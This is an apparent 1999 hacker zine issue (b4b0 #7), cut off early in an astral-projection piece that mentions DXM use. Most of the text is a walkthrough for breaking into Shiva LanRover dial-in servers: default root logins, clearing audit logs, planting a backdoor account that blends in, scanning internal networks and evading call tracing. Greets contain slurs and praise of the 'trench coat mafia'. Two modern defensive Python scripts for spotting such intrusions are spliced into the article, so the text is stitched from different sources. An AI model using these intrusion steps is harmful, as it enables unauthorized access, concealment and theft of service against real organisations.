B4b0 07
[ from the unexplored areas of the human brain comes.. ]
_________ ______ _________ _________
/\ ___ \ /| \ /\ ___ \ /\ ___ \
/ \ \ /\ \ | | |\ \ / \ \ /\ \ / \ \ /\ \
\ \ \__\ \ | | |_\ \__\ \ \__\ \\ \ \ \ \
\ \ < | | \\ \ < \ \ \ \ \
\ \ ___ `\ |/\_____ _\\ \ ___ `\\ \ \ \ \
\ \ \ /\ \ / / \ \ \ \ \ /\ \\ \ \ \ \
\ \ \__\ \\/____ \ \ \ \ \__\ \\ \ \__\ \
\ \________\ \ \____\ \ \________\\ \________\
\ / / \ / / \ / / \ / /
\/________/ \/____/ \/________/ \/________/
s e v e n
the experience of new ideas and obtuse perspective
[b4b0 inc. (c) 1999 all rights reserved]
[ disrupting the classes of school teachers ]
[ around the world. ]
[ this zine is best viewed in vi ]
[TABLE OF CONTENTS]
(00). Greets, Hellos, Staff, What not.
(01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
(02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
(03). How to have an out of body experience - [ph1x]
(04). Womper language interpretor - [chrak]
(06). Buffer overflow exploitation - [ph1x]
(07). The stupidity that lies in credit fraud - [KKR]
(08). Screwing around with /dev/audio - [ph1x]
(09). My day in age(Firewall, a magic bullet?) - [rhinestone]
(10). d0x (For your harrassing enjoyment) - [pG]
(11). Coding a shell from the ground up - [ph1x]
(12). The art of writing shell code - [smiler]
(13). The telephone system/network part 1 - [pabell]
(14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
(15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
(16). IRC lawgz, cybersex erotica - [b4b0]
(17). Revolution against the catholic church - [schemerz]
(18). bsaver.c overview - [cp4kt]
(19). Conclusion - [ph1x]
Additional pieces included in this issue of b4b0 are...
[ bouncer.c ] ----------> /juarez/bouncer.c | intruderx
[ Encrypt.c ] ----------> /juarez/encrypt.c | tragen
[ GHCgi.c ] ------------> /juarez/Cgi.c | FreD
[ Carp.c ] ----------> /juarez/carp.c | comp4ct
[ Scanned dialups ] ----> /juarez/carriers | comp4ct
[ FreeBSD rootkit ] ----> /juarez/fsd.gz | icesk
[ b4b0 screensaver ] ---> /juarez/bsaver.c | cp4kt/qytpo
[ el8 .zip of misc ] ---> /juarez/misc.zip | milcrat
. -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- -
|
| ph1x ----------- -----> the chosen one
: jsb4ch ---- --- -------> the undecided one
. t1p ------- --------> acclaimed b4b0 adm1n
gr1p ----- -- - -------> he whos accent slays
. j\ ------ -- ---- -----> the freezing wonder
chr4k ----- ------ ----> the one who operates with a blown mind
comp4ct --- ------ ----> he whom claims to be a b4b0 saint
. p4bell ---- ------ ----> the one called the golden child
coss4ck ---------------> the one of proclamation
sm1ler ----------------> he who is emotionally content
. -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- -
|
| icesk emf zayten
: pG schemerz
Hybrid assem
. Qytpo e-
rhinestone samj
jnz polder
.
--- Official IRC channel -> efnet / #b4b0
--- most idiotic site ever -> www.anticode.com
--- irc chick of the month -> MostHated
--- greets to -> #!animalcrackers, rhino9, samjs mom, duke,
horizon, LJ & Falon, HNN, those who
know who they are that have helped us and that
we forgot about *sorry*, chixy + miah of the
netcis crew (some of us started there!), the
trench coat mafia, the NRA
--- homosexual -> so1o (its good you came out of the closet)
--- fuck yous -> DigiEbola, silitek (as always), those who live
their lives around 'taking irc channels', and
people who molest their children (u siq fuqz)
--- note -> just because you have a southern accent and
hate jews doesn't mean you don't have to pay
your taxes.
--- interesting fact -> the now irc fad of saying "HEH" was invented
in #b4b0. so we must require you to say the
following when using HEH :
<somenick> HEH (c) b4b0 1999
--- P.S. -> we need more supporters who will write things
for us other than inetd backdoors. submit your
article/code/remarks submissions@b4b0.org
- -- ---> the bandz <--- -- -
lo fidelity all stars, rage against the machine, the chemical brothers, the
crystal method, misfits, minor threat, the decepticonz, danzig, and much, much
much more!
- -- ---> interesting <--- -- -
-- -- > www.babo.com - best gossip in korea!
-- -- > www.babo.net - aleman?
-- -- > trench coat mafia - bang.
-- -- > vandalisation of body - s4d1zm
-- -- > british association of balloon operators (babo) - fear that.
-------------------------------------------------------------------------------
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!
-------------------------------------------------------------------------------
Greatest movie of all time, "Gummo". ---->
I walked into the fruit market today, the clerk thought I was some out of
town hick. "Those apples will be 2 dollars a piece." He tells me. This is
where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing
me a dollar change, I say.. "keep it, were even." On the way out, I stepped
on a grape.
******************************************************************************
[INTRODUCTION]
******************************************************************************
y0y0y0 We have had several people who have taken charge
as editor for this issue, but have not followed through with their
responsibilities. Therefore, me (ph1x), the unreliable drug addict, has been
chosen to get all of the submissions together and put together a nice
issue with good quality reading material. I have miraculously managed to
do so, so read to your heart's desire, and enjoy this issue. HEH!
PS. I apologize for the extreme lateness of this issue, it's just
that jsbach *cough* I mean.. various people said they were
going to write articles, and never did. =)
MISC:
QUOTE: <kwan> you are the maker of youre
own destiny(Kwan = Gemmi) <-- These words inspired me.
<gezus> Real hackers drink chocolate milk!
b4b0 site of the month: http://www.frognet.net/dxm <- CHECK IT OUT!
L3tz giaT diZ sm4ck g01nG!@#$
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hacking the Shiva-LAN-Rover System
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
By Hybrid (th0rn@coldmail.com)
April 1999
Contents:
1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world.
If, like me, you have done quite a lot of scanning, you will have come across a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to focus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in its own right, in
the sense that once you have gained access to one of these platforms, you
have the opportunity to explore the entire network on which the system is
based; in essence, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.
To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:
@ Userid:
or, if RADIUS authentication is enabled:
Starting Radius Authentification....
@ Userid:
Blah, ignore the RADIUS authentication thing for now, it's just a lame
attempt to make the system look as if it has been secured; in most cases the
sysadmin will have misconfigured the authentication and you will be
surprised at how easy it is to get in. So you are at the login prompt,
what next? - As in most OSes, Shivas have a nice set of default logins, so the
sysadmin's poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason that the root account
works a lot is because in some cases the admin is not even aware the account
exists! Most of the system setup is done via the main terminal, so the
admin doesn't have to log in. The root account is not listed in the userfile
database, so most admins overlook it. In some cases the admin will have set
up their own account with something like <admin> <password>, but if the admin
has any common sense you will not get in with that. Like most OSes, Shiva
systems have an audit log, so don't sit there trying to brute force anything;
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've logged on as <root> <no password>, now what? -
read on.
Once logged in, you will be dropped into the Shiva command line prompt, which
should look something like this:
Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)
To get a list of the available commands type <help> or <?> this will reveal a
menu similar to this:
ShivaLanRover/8E# ? <enter>
alert Send text alert to all dial-in users
busy-out line <number> Busy-out serial line modem
clear <keyword> Reset part of the system
comment Enter a comment into the log
configure Enter a configuration session
connect <port pool> Connect to a shared serial port
crashdump Write crashblock to log
disable Disable privileges
help List of available commands
initialize <keyword> Reinitialize part of the system
lan-to-lan <keyword> Manage LAN-to-LAN connections
passwd Change password
ping <IP host> Send ICMP echo to IP host
ppp Start a PPP session
quit Quit from shell
reboot Schedule reboot
show <keyword> Information commands, type "show ?" for list
slip Start a SLIP session
telnet <IP host> Start a Telnet session
testline Test a line
The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:
ShivaLanRover/8E# show users <enter>
Line User Activity Idle/Limit Up/Limit
1 jsmith PPP 0/ 10 0/ None
2 root shell 0/ 10 0/ None
Total users: 2
So here we see ourselves logged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dial-in
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, i.e. check the admin is not logged in. Now you need to
get a rough idea of the size of the system and its network. At the # prompt
type:
ShivaLanRover/8E# show lines <enter>
Async Lines:
Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0
3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0
6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
Here we see a list of the modem ports, as you can see it has 8, this is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is, to do
this type:
ShivaLanRover/8E# show arp <enter>
Protocol Address Age Hardware Addr Type Interface
Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP
Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP
Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP
Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP
Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP
Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP
Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP
Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP
Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP
Showing the ARP cache reveals some of the boxes connected to the LAN, as well
as their Ethernet addresses and the type of protocol. Now we have established
the kind of system we are on, it's time to do some exploring, which is where I
shall begin this text file.
2. What can Shiva lan rovers do?
Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol). This is the key to gaining access to the
network on which the Shiva is based. In most cases the network will have
an internal DNS server, and if you are lucky, the network on which the system
is based will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.

Modem Outdial. In a lot of cases the system will have been configured to
allow modem outdialing, which can be good for calling BBSes, diverting to
other dialups, scanning, but again, this is lame, just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.

It's time to go into detail about all of the Shiva's functions and commands. I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.
3. The command line
When logged into the Shiva shell, you have the following commands at your
disposal:
alert (Send text alert to all dial-in users) - Self-explanatory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)
The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc.. to do this all you need to do is type <clear log> This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, best leave this alone for the
time being.
comment (Enter a comment into the log)
configure (Enter a configuration session)
Here's the part where you can get the system to do what you want it to do, i.e.
to get a PPP connection you will need to set up another account with shell
and PPP privileges. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account; using the config command you can create a new
user account with greater privileges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system, you don't want to make an account that will stick out from the other
accounts, so type:
show security <enter> (this gives a list of the security configuration and
the user list.) You should see something like this:
[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6
[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052
Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one as well. The idea is to make an account
that will blend in with the others and not look too obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc, more
on these functions in a bit. OK, now we need to set up our own account. To do
this we need to enter a configuration session; at the command line prompt
type:
ShivaLanRover/8E# config <enter>
You will then drop into the configuration session.
Enter configuration file lines. Edit using:
^X, ^U clear line
^H, DEL delete one character
^W delete one word
^R retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.
config> (here is where you enter the config commands, to make your own account
do the following)
config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)
Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.
You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password, you can later change this. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username, more on this later.
connect <PhoneGroup pool> (Connect to a serial port or modem)
This is another one of the good features of Shivas: you can remotely control
a series of modems on the system, and in a lot of cases dial out. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter>. You will then drop into
one of the modem pools, as follows:
Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.
(here basic modem commands are necessary, use the following to dial out)
ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number)
Note that in some cases the modem outdial
will be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be something simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is logged into the audit file, along with
the number you called. It is generally a good idea to clear the audit log
after things like PPP or dialout, again just type clear log <enter>.
cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privileges)
dmc <keyword> (Information commands, type "dmc ?" for list)
down <slot> <firstmodem> (last Remove modems from CCB pool)
info <slot> <modem> (Print info for specified modem)
mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
state (Print state of a modem)
status (Print status of all modems)
trace (Trace message passing)
up <slot> <firstmodem> (lastmo Add modems to CCB pool)
test_1slot <slot> (Tests DMC card in slot specified)
test_allcards (Tests all DMC cards found in system)
test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
test_loopall <count 0-99> (Tests All DMC's for count)
test_modempair <slot1> (modem1 Tests modems against each other)
test_slotpair <slot1> <slot2> (Tests a DMC card against another)
test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)
help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)
close <nickname> (Close tunnel to L2F HG)
login (Start L2F session)
tunnels (Show open tunnels)
lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)
show+
account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)
The show config command will reveal all the system configuration setups,
including DNS server information, security configurations, IP routing etc.
It will also show the internal IPs of RADIUS authentication and TACACS
servers.
show+
finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)
To get an idea of the routing information, and again how big the network is
type, show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are, it is a good idea to note the IP
prefixes.
show+
lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)
The show log command will display the system audit log in more format. Here
you will be able to see what is going on on the system, i.e. is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut-down example of what
you would see in a system log file:
Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00 4534 Serial4:PPP: IPCP layer up
00:04 4535 Serial4:PPP: CCP layer up
14:09 4536 Serial4:PPP: IPCP layer down
00:00 4537 Serial4:PPP: CCP layer down
00:00 4538 Serial4:PPP: LCP layer down
00:01 4539 Serial4:PPP: CD dropped on connection
00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06 4541 Serial4: Rate 115200bps
00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01 4543 Serial4: Initialized modem
04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06 4673 Serial4: Rate 115200bps
00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00 4675 Serial4: Initialized modem
55:11 4676 Could not parse IP SNMP request.
In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.
show+
modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)
slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)
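
Read from the defending side, the show log excerpt above is what a root shell session over a modem line looks like in the audit trail. The following is an added example, not part of the original article or of any Shiva software: Python that reads log text in that layout (ideally from a copy kept off the box, since clear log erases the on-box one) and reports logins by the built-in root account, sessions left open, and jumps in entry numbers. The field layout, and reading the second column as a running entry number, are assumptions taken from the excerpt; the sample lines are copied from it.

```python
import re

# Sample input: lines copied from the article's log excerpt (entries
# 4545-4550 and 4670-4672); the jump between them is where it was cut down.
SAMPLE_LOG = """\
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
"""

# Assumed layout: "<mm:ss since previous entry> <entry number> <message>", or
# a full date stamp in place of mm:ss, as on the excerpt's first line.
ENTRY = re.compile(r'^(?:\w{3} \d+ [\d:]+ \w+ \d{4}|\d+:\d\d)\s+(\d+)\s+(.*)$')
SESSION = re.compile(r'^(Serial\d+): New (.+) session$')
LOGIN = re.compile(r'^(Serial\d+): "([^"]+)" logged in$')
LOGOUT = re.compile(
    r'^(Serial\d+): "([^"]+)" logged out: .*after (\d+:\d\d) \((.*)\)$')

# Accounts whose every login deserves a look. The article describes "root" as
# a built-in account that is often left without a password.
WATCHED_USERS = {"root"}


def parse_line(line):
    """Return (entry_number, message) or None for lines that do not parse."""
    m = ENTRY.match(line.strip())
    return (int(m.group(1)), m.group(2)) if m else None


def analyze(text):
    """Summarise watched logins, entry-number gaps and unclosed sessions."""
    report = {"watched_logins": [], "gaps": [], "open_sessions": []}
    pending_kind = {}   # serial line -> kind announced by "New ... session"
    open_sessions = {}  # (serial line, user) -> entry number of the login
    prev = None
    for raw in text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        seq, msg = parsed
        # A jump means entries are missing from the copy being examined.
        if prev is not None and seq != prev + 1:
            report["gaps"].append((prev, seq))
        prev = seq
        if m := SESSION.match(msg):
            pending_kind[m.group(1)] = m.group(2)
        elif m := LOGIN.match(msg):
            port, user = m.groups()
            open_sessions[(port, user)] = seq
            if user in WATCHED_USERS:
                report["watched_logins"].append({
                    "entry": seq, "line": port, "user": user,
                    "kind": pending_kind.get(port, "unknown"),
                })
        elif m := LOGOUT.match(msg):
            port, user, _duration, _kind = m.groups()
            open_sessions.pop((port, user), None)
    report["open_sessions"] = sorted(
        (seq, port, user) for (port, user), seq in open_sessions.items())
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```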
4. System security
Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including RADIUS authentication, SecurID, TACACS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the RADIUS authentication server. In this case, the setup would look something
like this.

[RADIUS Authentication Server]   } The server contains a secured user list,
        |                          which will be used to verify login
        |                          requests. The login is determined if the
     [Router]                      user can be verified by the server.
      |    |
      |    |                     } The Shiva sends the login request to RADIUS.
  [Shiva System]                 } Starting Radius Authentification... @ Userid:

Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the RADIUS server, a secondary Shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have logged into a system, but
the above setup has been implemented. For example, say you logged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security>. If
the verification server has been set up, there will be no users in the user
list; instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification server, or primary Shiva, just use the show config command. You
can then telnet from the Shiva you are on to the Shiva displayed in the
config file; you should then get the @ Userid: login screen again. Try root,
no pass. If this does not work, it is possible to temporarily configure your
own server on the network, but this would mean other users will not be able
to log in, so leave this alone. If you do manage to log in to the server as
root, you have to set up your user account there, because that is where all
the Shivas on the network refer to in order to verify users; this way the
admin only has to maintain one user configuration file.
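
The other half of the weakness described in this section is the user list itself: an account added through a configuration session appears in show security as one more line, and carries no pwd= field until a password is set. Added example (not from the article or from Shiva's software): a Python check that parses a [Users] section in the format shown earlier and flags accounts that are missing from an approved list, have no pwd= field, or carry the /rt or /sh options. The sample configuration, its hash placeholders and the approved list are constructed; options the article does not explain (/di, /do, /tp, ml=, fail=, time=) are parsed but not judged.

```python
# Constructed sample in the layout of the article's "show security" output.
# Hash values are placeholders; the last line is the kind of entry the
# article's configuration session creates.
SAMPLE_CONFIG = """\
[UserOptions]
PWAttempts=0
ExpireDays=30
[Users]
admin=/di/do/rt/pw/sh/pwd=CONSTRUCTED-HASH-1/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=CONSTRUCTED-HASH-2/ml=2/time=897646052
mjones=/di/pw/pwd=CONSTRUCTED-HASH-3/ml=2/fail=5/time=897646052
username=/di/do/sh/tp/pw
"""

# Hypothetical input: the accounts the administrator knows should exist.
APPROVED = {"admin", "jsmith", "mjones"}


def parse_users(config_text):
    """Return {name: {"flags": set, "fields": dict}} from the [Users] section.

    Section names are compared case-insensitively because the article shows
    both [Users] (in output) and [users] (as typed into a config session).
    """
    users, section = {}, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "users" or "=" not in line:
            continue
        name, _, spec = line.partition("=")
        flags, fields = set(), {}
        for part in spec.split("/"):
            if not part:
                continue
            if "=" in part:            # key=value item such as pwd=... or ml=2
                key, _, value = part.partition("=")
                fields[key] = value
            else:                      # bare option such as sh, pw, rt
                flags.add(part)
        users[name] = {"flags": flags, "fields": fields}
    return users


def audit(users, approved):
    """Return (account, finding) pairs, sorted by account name."""
    findings = []
    for name, acct in sorted(users.items()):
        if name not in approved:
            findings.append((name, "not in approved list"))
        if "pwd" not in acct["fields"]:
            # Assumption: a missing pwd= field means no password is set,
            # as with the freshly created account in the article.
            findings.append((name, "no password set"))
        if "rt" in acct["flags"]:
            findings.append((name, "root privileges (/rt)"))
        if "sh" in acct["flags"]:
            findings.append((name, "remote command shell (/sh)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_users(SAMPLE_CONFIG), APPROVED):
        print(f"{account}: {finding}")
```

The built-in root account is not in the user list, as the article points out, so this check cannot see it; whether root has a password has to be verified separately on each unit.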
5. PPP
Once you have set up a user account with shell and PPP privileges, you can
begin exploring the network on which the Shiva is based. If the network
is net connected you can get free net access as well, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network or port scanner across the domain which the Shiva
is on. As on most networks, you are likely to come across a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers, in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to simultaneously dial out across the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. Using
the <connect all_ports> command will give you control over the system modems,
then you can dial out as if you were in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dial up to the system directly. The mistake people make when it comes to ANI,
or CLID, is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong*: the ANI service can be set up by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationally, so your originating CLID gets stripped at intralata
boundaries on the PSTN. A technique, which I don't wanna give out, involves
trunk and carrier hopping. Well, that's about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com, they will have technical guides in pdf format, you can
also download the Shiva software from their ftp site.
Shouts to the following:
[9x] substance phriend siezer vectorx statd
blotter knight network specialK microdot
katkiller xramlrak bosplaya deadsoul and
nino the 9x g1mp.
[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.
[D4RKCYDE] downtime elf zomba force mortis
angel dohboy brakis alphavax
tonekilla bishopofhell sintax
digitalfokus mistress.
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
[Astral Projection]
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
How to have an out of body experience. ph1x.
In this article I am going to explain what astral projection is,
and my personal method of accomplishing it.
NOTE: This method works for me while sober, and on dxm.
This method may not work for everyone, and is just my
personal way of inducing OOBE.
You may or may not have heard about people leaving their physical
bodies and projecting themselves into a higher dimension, known as the
astral plane. Believe it or not, this strange act of phenomena is
totally real, and many people today practice methods that will eventually
lead them to dissociating themselves from their physical bodies. It is
